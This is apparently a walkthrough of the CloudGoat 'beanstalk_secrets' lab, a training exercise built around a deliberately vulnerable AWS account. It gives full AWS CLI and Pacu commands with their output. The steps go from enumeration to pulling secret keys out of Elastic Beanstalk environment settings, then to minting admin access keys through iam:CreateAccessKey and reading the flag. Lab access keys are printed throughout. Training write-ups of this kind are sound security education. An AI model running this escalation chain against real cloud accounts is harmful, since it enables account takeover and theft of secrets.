Beanstalk (CloudGoat)
Beanstalk
Initial Access
# credentials
initial_low_priv_credentials = Access Key: AKIA4YM7GTDHDNB4GXV7
Secret Key: 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
# configure
aws configure --profile low_level
AWS Access Key ID [None]: AKIA4YM7GTDHDNB4GXV7
AWS Secret Access Key [None]: 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
Default region name [None]: us-east-1
Default output format [None]: json
#whoami
aws sts get-caller-identity --profile low_level
{
"UserId": "AIDA4YM7GTDHOLCJS5VMB",
"Account": "877044078798",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user"
}
Enumeration
# listing attached policies
aws iam list-attached-user-policies --user-name cgidg0l919nvpe_low_priv_user --profile low_level
An error occurred (AccessDenied) when calling the ListAttachedUserPolicies operation: User: arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user is not authorized to perform: iam:ListAttachedUserPolicies on resource: user cgidg0l919nvpe_low_priv_user because no identity-based policy allows the iam:ListAttachedUserPolicies action
# listing managed policies
aws iam list-user-policies --user-name cgidg0l919nvpe_low_priv_user --profile low_level
An error occurred (AccessDenied) when calling the ListUserPolicies operation: User: arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user is not authorized to perform: iam:ListUserPolicies on resource: user cgidg0l919nvpe_low_priv_user because no identity-based policy allows the iam:ListUserPolicies action
# switching to pacu
# brute forcing permissions
Pacu (beanstalk:imported-low_level) > run iam__bruteforce_permissions
"Permissions": {
"Allow": [
"ec2:DescribeSubnets",
"dynamodb:DescribeEndpoints",
"sts:GetSessionToken",
"sts:GetCallerIdentity",
"sts:GetCallerIdentity",
"sts:GetSessionToken",
"ec2:DescribeSubnets",
"dynamodb:DescribeEndpoints",
"dynamodb:DescribeEndpoints",
"ec2:DescribeSubnets",
"sts:GetCallerIdentity",
"sts:GetSessionToken",
"sts:GetCallerIdentity",
"sts:GetSessionToken",
"ec2:DescribeSubnets",
"dynamodb:DescribeEndpoints"
Given the name beanstalk, we can take a logical guess and assume there is some kind AWS Elastic Beanstalk instance
What is AWS Elastic Beanstalk
is a PaaS offering by AWS that simplifies the process, managing and scaling web applications and services
Key concepts
What it does:
Elastic Beanstalk automatically handles:
Provisioning infrastructure (e.e., EC2, Load Balancers, Auto Scaling)
Deploying code in supported environments
Monitoring application health and metrics
Scaling resources based on load
Supported Stacks
Languages and frameworks: Java, .NET, Node.js, Python, PHP, Ruby, Go, and Docker
Application servers: Apache, Nginx, Passenger, and IIS
Deployment Model
You just upload your code, and bean stalk handles
EC2 provisioning
Load balancing
Auto-scaling
Monitoring/logs via CloudWatch
Enumerating Beanstalk applications and environments
List all Elastic Beanstalk Applications
aws elasticbeanstalk describe-applications --profile low_level { "Applications": [ { "ApplicationArn": "arn:aws:elasticbeanstalk:us-east-1:877044078798:application/cgidg0l919nvpe-app", "ApplicationName": "cgidg0l919nvpe-app", "Description": "Elastic Beanstalk application for insecure secrets scenario", "DateCreated": "2025-07-09T08:35:26.190000+00:00", "DateUpdated": "2025-07-09T08:35:26.190000+00:00", "ConfigurationTemplates": [], "ResourceLifecycleConfig": { "VersionLifecycleConfig": { "MaxCountRule": { "Enabled": false, "MaxCount": 200, "DeleteSourceFromS3": false }, "MaxAgeRule": { "Enabled": false, "MaxAgeInDays": 180, "DeleteSourceFromS3": false } } } } ] }As you can see, we have found a beanstalk application, from which we can see the following
ApplicationArn:
arn:aws:elasticbeanstalk:us-east-1:877044078798:application/cgidg0l919nvpe-appApplicationName:
cgidg0l919nvpe-appetc
We can enumerate the environment
aws elasticbeanstalk describe-environments \ > --application-name cgidg0l919nvpe-app \ > --profile low_level \ > --region us-east-1 { "Environments": [ { "EnvironmentName": "cgidg0l919nvpe-env", "EnvironmentId": "e-qdmmkwibbc", "ApplicationName": "cgidg0l919nvpe-app", "SolutionStackName": "64bit Amazon Linux 2023 v4.6.0 running Python 3.11", "PlatformArn": "arn:aws:elasticbeanstalk:us-east-1::platform/Python 3.11 running on 64bit Amazon Linux 2023/4.6.0", "EndpointURL": "awseb-e-q-AWSEBLoa-77L0EJYWIEY-1878151744.us-east-1.elb.amazonaws.com", "CNAME": "cgidg0l919nvpe-env.eba-usp2hym4.us-east-1.elasticbeanstalk.com", "DateCreated": "2025-07-09T08:35:48.437000+00:00", "DateUpdated": "2025-07-09T08:38:31.684000+00:00", "Status": "Ready", "AbortableOperationInProgress": false, "Health": "Grey", "HealthStatus": "No Data", "Tier": { "Name": "WebServer", "Type": "Standard", "Version": "1.0" }, "EnvironmentLinks": [], "EnvironmentArn": "arn:aws:elasticbeanstalk:us-east-1:877044078798:environment/cgidg0l919nvpe-app/cgidg0l919nvpe-env" } ] }What we are trying to look for are
Environment names
CNAMEs
Status, health
Possible public-facing endpoints or services
Now we want to extract configuration settings (Secrets)
aws elasticbeanstalk describe-configuration-settings \ --application-name cgidg0l919nvpe-app \ --profile low_level \ --region us-east-1 \ --environment-name cgidg0l919nvpe-envOutput
Ive placed the most interesting secret below
{ "Namespace": "aws:elasticbeanstalk:application:environment", "OptionName": "SECONDARY_ACCESS_KEY", "Value": "AKIA4YM7GTDHGW25E5ZA" }, { "Namespace": "aws:elasticbeanstalk:application:environment", "OptionName": "SECONDARY_SECRET_KEY", "Value": "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" }We could have speed run this with pacu’s
elasticbeanstalk__enummoduleFrom enumerating the beanstalk environment configuration we have found some credentials material
# configure aws configure --profile beanstalk AWS Access Key ID [None]: AKIA4YM7GTDHGW25E5ZA AWS Secret Access Key [None]: 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 Default region name [None]: us-east-1 Default output format [None]: json # whoami aws sts get-caller-identity --profile beanstalk { "UserId": "AIDA4YM7GTDHFW7VIBRD5", "Account": "877044078798", "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_secondary_user" } # pacu # after importing beanstalk creds, brute force permissions Pacu (beanstalk:imported-beanstalk) > run iam__bruteforce_permissions
Enumerating as the secondary user
Enumerating users within the AWS account
aws iam list-users --profile beanstalk{
"Users": [
{
"Path": "/",
"UserName": "cgidg0l919nvpe_admin_user",
"UserId": "AIDA4YM7GTDHMRHIFUQTS",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_admin_user",
"CreateDate": "2025-07-09T08:35:26+00:00"
},
{
"Path": "/",
"UserName": "cgidg0l919nvpe_low_priv_user",
"UserId": "AIDA4YM7GTDHOLCJS5VMB",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_low_priv_user",
"CreateDate": "2025-07-09T08:35:27+00:00"
},
{
"Path": "/",
"UserName": "cgidg0l919nvpe_secondary_user",
"UserId": "AIDA4YM7GTDHFW7VIBRD5",
"Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_secondary_user",
"CreateDate": "2025-07-09T08:35:26+00:00"
},
{
"Path": "/",
"UserName": "cloudgoat",
"UserId": "AIDA4YM7GTDHAVQ7JT75L",
"Arn": "arn:aws:iam::877044078798:user/cloudgoat",
"CreateDate": "2025-06-30T03:27:40+00:00"
}
]
}Listing attached user policies for secondary user
aws iam list-attached-user-policies --user-name cgidg0l919nvpe_secondary_user --profile beanstalk{
"AttachedPolicies": [
{
"PolicyName": "cgidg0l919nvpe_secondary_policy",
"PolicyArn": "arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy"
}
]
}Viewing attached user policy metadata
aws iam get-policy --policy-arn arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy --profile beanstalk{
"Policy": {
"PolicyName": "cgidg0l919nvpe_secondary_policy",
"PolicyId": "ANPA4YM7GTDHPO75PGETD",
"Arn": "arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy",
"Path": "/",
"DefaultVersionId": "v1",
"AttachmentCount": 1,
"PermissionsBoundaryUsageCount": 0,
"IsAttachable": true,
"CreateDate": "2025-07-09T08:35:26+00:00",
"UpdateDate": "2025-07-09T08:35:26+00:00",
"Tags": [
{
"Key": "Scenario",
"Value": "beanstalk_secrets"
},
{
"Key": "Stack",
"Value": "CloudGoat"
}
]
}
}Viewing the actual attached policy
aws iam get-policy-version --policy-arn arn:aws:iam::877044078798:policy/cgidg0l919nvpe_secondary_policy --version-id v1 --profile beanstalk {
"PolicyVersion": {
"Document": {
"Statement": [
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"
},
{
"Action": [
"iam:ListRoles",
"iam:GetRole",
"iam:ListPolicies",
"iam:GetPolicy",
"iam:ListPolicyVersions",
"iam:GetPolicyVersion",
"iam:ListUsers",
"iam:GetUser",
"iam:ListGroups",
"iam:GetGroup",
"iam:ListAttachedUserPolicies",
"iam:ListAttachedRolePolicies",
"iam:GetRolePolicy"
],
"Effect": "Allow",
"Resource": "*"
}
],
"Version": "2012-10-17"
},
"VersionId": "v1",
"IsDefaultVersion": true,
"CreateDate": "2025-07-09T08:35:26+00:00"
}
}If we look at the following
{
"Action": [
"iam:CreateAccessKey"
],
"Effect": "Allow",
"Resource": "*"This alows the creation of new access keys for any IAM user
Privilege esc to Admin User
From this we can create a new access key for the administrative user
aws iam create-access-key --user-name cgidg0l919nvpe_admin_user --profile beanstalk { "AccessKey": { "UserName": "cgidg0l919nvpe_admin_user", "AccessKeyId": "AKIA4YM7GTDHFFR5Y26E", "Status": "Active", "SecretAccessKey": "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", "CreateDate": "2025-07-09T09:56:39+00:00" } }We can now assume the admin
aws configure --profile beanstalk_admin AWS Access Key ID [None]: AKIA4YM7GTDHFFR5Y26E AWS Secret Access Key [None]: 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 Default region name [None]: us-east-1 Default output format [None]: json #whoami aws sts get-caller-identity --profile beanstalk_admin { "UserId": "AIDA4YM7GTDHMRHIFUQTS", "Account": "877044078798", "Arn": "arn:aws:iam::877044078798:user/cgidg0l919nvpe_admin_user" }Now we can retrieve the final glab from the AWS secret manager
# Listing secrets in secret manager aws secretsmanager list-secrets --profile beanstalk_admin { "SecretList": [ { "ARN": "arn:aws:secretsmanager:us-east-1:877044078798:secret:cgidg0l919nvpe_final_flag-ht4jbx", "Name": "cgidg0l919nvpe_final_flag", "LastChangedDate": "2025-07-09T18:35:28.773000+10:00", "LastAccessedDate": "2025-07-09T10:00:00+10:00", "Tags": [ { "Key": "Stack", "Value": "CloudGoat" }, { "Key": "Scenario", "Value": "beanstalk_secrets" } ], "SecretVersionsToStages": { "terraform-20250709083527730700000002": [ "AWSCURRENT" ] }, "CreatedDate": "2025-07-09T18:35:25.827000+10:00" } ] } # retrieving the flag aws secretsmanager get-secret-value --secret-id cgidg0l919nvpe_final_flag --profile beanstalk_admin { "ARN": "arn:aws:secretsmanager:us-east-1:877044078798:secret:cgidg0l919nvpe_final_flag-ht4jbx", "Name": "cgidg0l919nvpe_final_flag", "VersionId": "terraform-20250709083527730700000002", "SecretString": "FLAG{D0nt_st0r3_s3cr3ts_in_b3@nsta1k!}", "VersionStages": [ "AWSCURRENT" ], "CreatedDate": "2025-07-09T18:35:28.768000+10:00" }
Last updated